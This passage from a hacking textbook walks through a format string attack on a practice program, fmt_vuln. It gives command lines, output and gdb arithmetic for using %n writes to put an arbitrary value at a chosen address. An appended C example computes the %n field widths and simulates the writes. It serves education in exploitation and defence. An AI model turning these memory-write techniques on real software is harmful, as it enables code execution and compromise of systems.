The addresses and junk data now at the beginning of the format string changed
the value of the field width needed for the padded %x format parameter.
It is easily recalculated using the same method as before. Another way to
arrive at it is to subtract 24 from the previous field width of 150, since
6 new 4-byte words (three more addresses and three JUNK words) have been
added to the front of the format string, and 150 - 24 = 126.
Now that all the memory is set up ahead of time in the beginning of the
format string, the second write should be simple.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa
reader@hacking:~/booksrc $
The next desired value for the least significant byte is 0xBB. A hexadecimal
calculator (gdb serves the purpose here) quickly shows that 17 more bytes need
to be written before the next %n format parameter. Since memory has already
been set up with a word for a %x format parameter to consume, it's simple to
write 17 bytes using the field width option.
This process can be repeated for the third and fourth writes.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"
$1 = 17
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $
By controlling the least significant byte and performing four writes, an
entire address can be written to any memory address. It should be noted that
the three bytes found after the target address will also be overwritten using
this technique: each %n stores the full 4-byte count, so the write aimed at
the target's last byte spills its three high bytes into whatever follows.
This can be quickly explored by statically declaring another initialized
variable called next_val, right after test_val, and also displaying this
value in the debug output. The changes can be made in an editor or with
some more sed magic.
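The arithmetic behind the four writes above, as an added example that is not code from the book or from fmt_vuln: it computes the field width for each %n write from the bytes already printed (the 28-byte address/JUNK prefix plus the 16 characters of the two bare %x parameters, as on this page), builds the same `%x%x%126x%n%17x%n%17x%n%17x%n` string, and then simulates the writes byte by byte into a small memory image so the spill into the three bytes after the target is visible. It also handles the general case where a later byte is smaller than the current count, by wrapping the width past 0x100. The 8-byte image standing in for test_val and next_val is constructed, and next_val's starting value of 0x11111111 is an assumption; no %n is passed to printf, only simulated.

```c
/* Added example: field-width calculation and a byte-level simulation of
 * the four %n writes described above. Not the book's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NUM_WRITES 4

/* Characters printed before the first padded %x on this page:
 * 7 four-byte words (4 addresses + 3 JUNK) = 28 bytes, plus the two
 * bare %x parameters printing bffff3b0 and b7fe75fc = 16 characters. */
#define PAGE_BASE_LEN (28 + 16)

/* Field width for each %x that precedes a %n, chosen so the running
 * character count's low byte equals the next byte of value (least
 * significant byte first).  min_len[i] is the minimum number of
 * characters that %x prints regardless of width (1 for the word 0,
 * 8 for a JUNK word); a smaller width would be ignored by printf, so
 * the delta is wrapped by 0x100 instead. */
void compute_widths(uint32_t value, unsigned base_len,
                    const unsigned min_len[NUM_WRITES],
                    unsigned widths[NUM_WRITES])
{
    unsigned count = base_len;
    for (int i = 0; i < NUM_WRITES; i++) {
        unsigned want  = (value >> (8 * i)) & 0xff;
        unsigned delta = (want - (count & 0xff)) & 0xff;   /* mod 256 */
        while (delta < min_len[i])
            delta += 0x100;            /* wrap: low byte unchanged, count grows */
        widths[i] = delta;
        count += delta;
    }
}

/* The format-parameter part of the argument: two %x to step past the
 * first two stack words, then one padded %x and one %n per target byte. */
void build_format(const unsigned widths[NUM_WRITES], char *out, size_t out_len)
{
    size_t used = (size_t)snprintf(out, out_len, "%%x%%x");
    for (int i = 0; i < NUM_WRITES && used < out_len; i++)
        used += (size_t)snprintf(out + used, out_len - used, "%%%ux%%n", widths[i]);
}

/* Apply the %n writes to an image of memory.  Each %n stores the full
 * 4-byte count (little endian, as on x86), so write i lands at
 * target_off + i and its three high bytes spill past the target.
 * Returns -1 if a write would fall outside the image. */
int simulate_writes(uint8_t *mem, size_t mem_len, size_t target_off,
                    unsigned base_len, const unsigned widths[NUM_WRITES])
{
    unsigned count = base_len;
    for (int i = 0; i < NUM_WRITES; i++) {
        count += widths[i];
        if (target_off + i + 4 > mem_len)
            return -1;
        for (int k = 0; k < 4; k++)
            mem[target_off + i + k] = (count >> (8 * k)) & 0xff;
    }
    return 0;
}

/* Little-endian 32-bit read, independent of host byte order. */
uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

int main(void)
{
    const unsigned min_len[NUM_WRITES] = {1, 8, 8, 8};   /* word 0, then JUNK */
    unsigned widths[NUM_WRITES];
    char fmt[64];

    compute_widths(0xddccbbaaU, PAGE_BASE_LEN, min_len, widths);
    build_format(widths, fmt, sizeof fmt);
    printf("format parameters: %s\n", fmt);

    /* Constructed image: test_val (any content, all four bytes are
     * overwritten) followed by next_val, assumed to start as 0x11111111. */
    uint8_t mem[8] = {0, 0, 0, 0, 0x11, 0x11, 0x11, 0x11};
    simulate_writes(mem, sizeof mem, 0, PAGE_BASE_LEN, widths);
    printf("test_val = 0x%08x\nnext_val = 0x%08x\n",
           read_le32(mem), read_le32(mem + 4));
    return 0;
}
```

The simulation shows why the page warns about the bytes after the target: the last write stores the count 0x000000dd at target+3, so next_val keeps only its top byte. Writing a value whose later bytes are smaller than the earlier ones (such as 0x08049794) forces the wrapped widths, which is what `compute_widths` handles.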